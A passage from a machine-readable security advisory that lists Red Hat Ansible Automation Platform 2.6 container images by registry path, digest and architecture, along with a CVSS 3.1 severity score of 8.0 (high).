"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:c4bc8ce6d217e861df5c0228812c612e9b1c200f3654b26e8bdfd36642b79c57_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:ec267e7bd945593d9bcd3be6201176e5b28376cdd5900d5da8c6f033b0420558_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:97b8905f103277144991667b7953a08fd7a7b2edc448a3d5b5195f1af6802014_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:d7fb722c1e4646d29ee32f5f9a74f7da3c87e07da52a7f28d58017931d375305_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:e779c125e7fd9307e117fc7f4e4411f450871417f0447deb68c3821c26cae764_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:e8113d25fd42fc3a31dc9bb120764c3b508995c23f73f7e99e0200ac411ad229_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:2a24b3e44cd208c8176d4739cf3fc7a19e9fff3b531ab7718de6f5a99db4e4d1_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:47fa330b3fe99501ba7d4b4bb5bc8b5ba0ea7880472070b27250b36fce3d035c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:71a06d4925ea829abc69b3ab518f08844faeaf524bad4c1e6fbc658b8227e0ab_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:fa606a224ac6d3d5e17650a9b9a52e5cb76af57dc767adf79609e0ab95081304_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:08cca1f9a75b0352f17d517f6b7bab53ccf7fba7ef1ff5cedf777c5b68dd15fa_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:381cb54bf157086017cfea6db2a32895b6109640520b4f35f4791b2295c0db29_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:8acf8e32e0dfca8b9a4cfcd765509424a8c1b884ad382a5f21d58e8c44e56cae_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:b46b200558db6b92db270ee3749b8d14b778208ab9ab59e2b7c00dc018d2f3ce_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:30745071ac71a3fdd97d062f180c8fd05d75d9955d4cfccbcf2aeec8deb7f084_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:3ce796ad0c27b82cd6ba0cd946da69e2d62ad392f60dff571a6e826ab17dd8bc_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:5c06c479d96b8340382301cb60505f05afcb064d3daf3951df9d8a108b1e4a97_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:c0a8ca9591bb9385e2a8773aedbb40f84f4f4f229b0ec1b9bf16c4cedef2f6ad_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:a48db0666b33ef1be5ab4ff02d7584c3fa1516c8a18f09295ae6a220d2e2ebf6_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:b475aea1e95b14a065f76a83e5c8aa74f274955297762808f059ed857cd9cb92_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:bf591d6bc29f3c394b29fd34b0a458cee5c3368130f1aa1e226e49fd112c44fc_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:e7369d9a7242b115b78f7ff72c1a59912fb8304e93220a6faeaf44c25c6b5a71_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:2a12a79a557dd5e32b77eb977c3698ae2191f015121d38689369ae39f22a5f11_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:3b61f49f0dd276d22d67f3e97fb9ffa3382b4a086416f6e59b20ec3e492871cd_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:53432365b9bb22c5df6da741687df208111fcabdea834a3fe9159b0ecf4b73df_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:9e0ca740576e5ddc2af43456f7a8b1dc74e37a4f0734236848b8fae58a0a2e8b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:38f097e4920d4e64c8b8839fcc353f4ff32e607719b5e36f23e208bc70d75b59_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:464caa10ae549dff7824e330f9d5e7e10aacf7b9ee056a6b4aa2768953c94fd8_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:9c7fea42d26e687c017aa573fa13b01ee738c88fe11e55317430e4e8b66d339c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:d0a2f84070918986561679893a78e6da279f7680fb7c00bddcc518974ba1e39c_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:361532ae39672ed922d1e23a09c99cc6f3e596e482c0180d9858346b584c9449_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:8a8db7f1d38de954a4d61f8a98cd91edfe182fcf78750fdaaeb3cf3654897a97_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:96403661397e470423486a3016ea895dc68885d9ba7f855921cda3825d974eb3_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:bf9c237fdc696c54f4263caac1c8784fd77a4a2d55dd59f31dc5008a809cf276_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:03b16022be5e25db2bf45e01526c42b782baba00c0b94175d5598fe65574460e_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:6051f354edc4b2e1143062dd5912d55e90f5db762fca6d7fa8df03bc29b06b0d_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:87db0da260805165f54ef956c9e4b1e6a4f6e559306a35558696fb2861422cef_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:e7c8da3d2b7b9c2cfd4240a232b5a388e6ca09927b77b83ca95c66d0270846b0_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:63ccd8ad711852fb955c10b1ee57fd3895e50220ce5f1877e58130a7ff8128a6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:6734e6c33e10a5511392126f447a92c57bfd2ef5f3c3650230a5910e3e20fcf1_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:7576c16f17a67d327a1b275b34c1612ae3811c849ef163eb44a6c6013659382e_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:7dfd8a045a5df672dc2b4f76bff307c0a78c1703e0572f10c1e07bd46e735947_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:08b6f737eed5ee48478db9bfaceb6e9339e2824ecc1973728c697ceae48a488f_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:54621aa4ed969de8ec7e3d137178e35ba0fc61c43795e1bd0282c7219bb1d5b0_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:a9c0c6bcdcb061b85074a7e681c6152e7dc64b85571f2cc17001e18f26276ba8_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:da378637b565a2793993a1da503bf13f0c1f135e8cc5c6e569f9ee7c8617023c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:2f9958a2ab37aa25749d5cb9eb9d0dc8bf6b79846963c04f95d09bcc061431e9_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:63abb6f786ed50165351ec2f03649ef0ff5d05e06a939e2314c8b8b4729e803a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:ad9dd51cd467fa3da27d65919644e364baf3c62a7942c9261ea17b72875d7071_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:f5cce04af00f9b56926d067e21e7e252b8d86226f1173f9840ff94d9e8e99d8b_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:3bb5c591fa83d61af4a21f63ab1e044aa56f86a89cbda17b77b98a2a3bb088b9_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:6f03123e4543be01c7f3b592d55db7793a95d1983a1fe8c3ff2ad1c043cc54a4_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:b579af422da0bb4bc6fe17e598ca356e68957b566d9a607ff854ad6039572a56_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:eb6a63704d33b1dcb9eefea57763389c0eeb94c6206e63711c95ac3f0163753c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:5148ead7df13311bd0b39fe2f02f4dc6f11d062598944c9b451a6c8e8b0c45f4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:5f8cfecd3442742b867aeba03ea24009fbd89b31cec0dc02eb02c4d9098dfcec_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:a595b43d0efdd820048fbb9e7a8cefad5d2d20ae0d271fb16b34dd744b95e9eb_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:c1c608e5ee45a6d6248d7657e9b7f17cdb3f8342af9b5e94145217c6fb6efc2a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:71a2f5713323a2d2140d476cb48b66dedeb6f89faf88192dfe40da6c294e2089_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a85326093ec7a9ccde87ea243ad83934707fcef4871fccd934efcba50f355b94_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:af2444728b4c244f8e1b56a0f9d9c9325a1887987f25418833df09947f4ed7e5_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:e1daf0343f7b3e10b7843f85d64bd0ce35612e333597b7c5b48f033b7ec21c89_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:0c3c53caa8ccbea82dfc5dfe795e2e77fc84fd2a485cf0888a095ebe13305363_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:50cee84ad72794144820f6b6d08583387ab4e5f0a6d81ea495430290b173b1ea_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:660235348fa58da3e9a78c757e0cfc5b7f03c5760b9086d2876d87a20888f6a2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:ab5fb18f89334216119c70498585d74c689cdbf8fd21b5826b782d0b5427051f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:1a440c21e1d882875a73201b3135957387f0d7846678b22b52732e984931099a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:50f2bcf49966112665eb82a30e199af6041624e5cdb2372a85075405acf63ab8_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:a4927ab07375561c595afb1898ea52e28a9efb6910bee1011332d23344052e3f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:f69d4d8b4e9ad3666d4fa1aced7a01136f738b49f9c818ee71f7fbd44ff111ec_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:45057e5ae8e5a7bb6646bd7896707859539039e409ac334e8cb3eb99c554e031_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:5565418214a3480ba6e3a85f56838678549e515e374535813dfdc03700950cb7_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:9e97f4cb07e63cc820b988ff3bf7079a087f596341399339f9a94d056ac69301_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:fe1c1dc037cf3e7e690092c761452de7111a899c73512ae9132479f7262139f4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:544021b673fcef3bfe5291e0e82ed387d93735b52c983cd7b8b15779f4676ac1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:d0230cc8ceaa4a82381b566d3661a49567f62c47ec8da11e8c96550e30bcb88f_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:d1246fb6fa7ff8221d88c00d73fa59ccfdc09eb3260af45adc8ddf568c5a0398_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:f5c7dd391581c2549b57ea4a5f61133221d19951ac45ff10952bc26048b71975_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:389567d267aab51c7fce52a23439c821995099cec9e37f5962a5dc2114597f84_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:417900ad18144b608fd23c8106aa8824048176eaf5f41eff1af47c43c75b7a89_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:d4c4bb796641f32563ce478b6fc912d1d809b83220a8843cd440ffadb788d17f_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:e607ceaa2e3e14859f1ad60b394a1a896c5505662fa17b10f5afd532bda8be9f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:24d7574341fa646e12ca5180a655271b9d947907af80da860b2dab0b51442d12_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:405eeb4b9ece480096d6b4246999ed043c5c2af47006b50677a5f83df870fbe9_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:653fd44dc56da7c4405e458fdcafdc358e323b1d917b97483cf37068da484088_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:77acabaa8cabde7fca8b90fffd651da92eacd54da6eb76933c749656535ef55c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:9683a91e7d16893fe030e1701a2500d1e79c7bea0ab7557438b53d281acd14e4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:9c3bee41f02ed223da8fd3e7a5fc73a67ef82837b947f785a85c6de742c2c75a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:a15644ebe6166a891d02fd672fa1c83242713096d3754a2fd20aa0627ccf45bf_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:a217de550b6a6509eca369318e2bd9585a70c67756ac9980f933b548de668f8d_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:184a16150bdf285e1a32a0901871b8fcee6be9529e95de219fd4702d27eeadf0_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:461fc04f1bc051c5ce6ced0e7d7179e9078dd5545eced38bdc37df7a9c06e722_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:64a02cef795fdf08d8b1d5c8bcc96c21c0196360ee3976a4afe5bdae98d3bf77_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:ba3d764e2fcd2d4a8e145a1559bcf9c6daa006c1844ec0f22fecddd18fb39deb_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:33d841d14081ec5f0289e79b6644acb4b5a038f59191493d763d7db4328aeb94_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:7a40a0df543d520528dc35c3fe1c224b298bf24858f29bbedd879f1b23396f55_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:b13680f6f1c058afdca28132b54195532c8cbc0ac634d16591c1a98088933768_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:e037940ea94d2cf16586ec35000a890066860865e992949a28b0a52e18b8b3fa_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:118ad39a5e775943911f5ec803eea0051dc1c720a4b3d3402394e68fa5ca7ca7_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:18f55feaae83ee6506b3af76cdd511687e82995440f87af6e9b9aefa06e726ad_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:644bdbea9feb95628cb142c21d52a2357261a9fd2386ffae978971dd68cad3ec_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:db407b56e08976d1a1014d6248ef3719e3b15dc2171d5281b21a865252c8016a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:0e36aa1324c5cb24a1217dfb477731e386311c29880dc76453756aca4776080a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:16a9f451252541eb555f27528fc547724345767b364d913323077743b84b1b7b_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:787d0e6df45128836d907732ca546d054f10f2fd8708ec6fdbdb2418f9445066_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:d7869fb6e7fce7a1a26841475449f9c7c0b9c29445f5c9c5bd226abfa4ba7f26_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:033fec39621ff64fd83905a4d656ecce7907f7c5531855253a682f414702561d_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:5eaeaaf91e9d13054c54d3060ba8380b42b72d1087612f65baca29c036d593a9_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:9bb6427006e96866392ac8804990b85f9ae7b5f4f1575e7d6123a3ab8d4b365e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:a6ecee20b39158df405c56ed811a882c2ea82a996308b51fad6ac659c669c566_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:62c5e15e425dd562e0a8199e437cdbd2f29e239bd758c25c893ef0a60e767128_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:f72a736351733cb24b8243647309abcdf086f0cb8fe59e12a3e95510917dfb4d_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.0,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:1e388383c5111049bb8f2d1f37fcee6773067152d256492f7e9db908d52b4652_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:6458f36f24c26733e1a052ce8a1beac8efed6da6574133103d8dc7b868e580b2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:b1561aa0c5cdc34467541dddd7be145859c3d3d041989d483eb54a720a65ec26_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:dbaddb3974c4ca1a4f7e58b0a3d91ba7d2d946100cf55c6acd740a61ad2fb143_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:5049e7dd3ec73b82a0fdc7ba1f5c2ce7bfc4bfee023af24133d1c48eb2838d50_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:7c971a91ac52f6d5e8702548923890afb2aa586731c5092396d3e769516fb7ed_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:c4bc8ce6d217e861df5c0228812c612e9b1c200f3654b26e8bdfd36642b79c57_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:ec267e7bd945593d9bcd3be6201176e5b28376cdd5900d5da8c6f033b0420558_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:97b8905f103277144991667b7953a08fd7a7b2edc448a3d5b5195f1af6802014_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:d7fb722c1e4646d29ee32f5f9a74f7da3c87e07da52a7f28d58017931d375305_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:e779c125e7fd9307e117fc7f4e4411f450871417f0447deb68c3821c26cae764_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:e8113d25fd42fc3a31dc9bb120764c3b508995c23f73f7e99e0200ac411ad229_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:2a24b3e44cd208c8176d4739cf3fc7a19e9fff3b531ab7718de6f5a99db4e4d1_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:47fa330b3fe99501ba7d4b4bb5bc8b5ba0ea7880472070b27250b36fce3d035c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:71a06d4925ea829abc69b3ab518f08844faeaf524bad4c1e6fbc658b8227e0ab_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:fa606a224ac6d3d5e17650a9b9a52e5cb76af57dc767adf79609e0ab95081304_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:08cca1f9a75b0352f17d517f6b7bab53ccf7fba7ef1ff5cedf777c5b68dd15fa_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:381cb54bf157086017cfea6db2a32895b6109640520b4f35f4791b2295c0db29_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:8acf8e32e0dfca8b9a4cfcd765509424a8c1b884ad382a5f21d58e8c44e56cae_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:b46b200558db6b92db270ee3749b8d14b778208ab9ab59e2b7c00dc018d2f3ce_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:30745071ac71a3fdd97d062f180c8fd05d75d9955d4cfccbcf2aeec8deb7f084_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:3ce796ad0c27b82cd6ba0cd946da69e2d62ad392f60dff571a6e826ab17dd8bc_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:5c06c479d96b8340382301cb60505f05afcb064d3daf3951df9d8a108b1e4a97_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:c0a8ca9591bb9385e2a8773aedbb40f84f4f4f229b0ec1b9bf16c4cedef2f6ad_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:a48db0666b33ef1be5ab4ff02d7584c3fa1516c8a18f09295ae6a220d2e2ebf6_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:b475aea1e95b14a065f76a83e5c8aa74f274955297762808f059ed857cd9cb92_s390x",
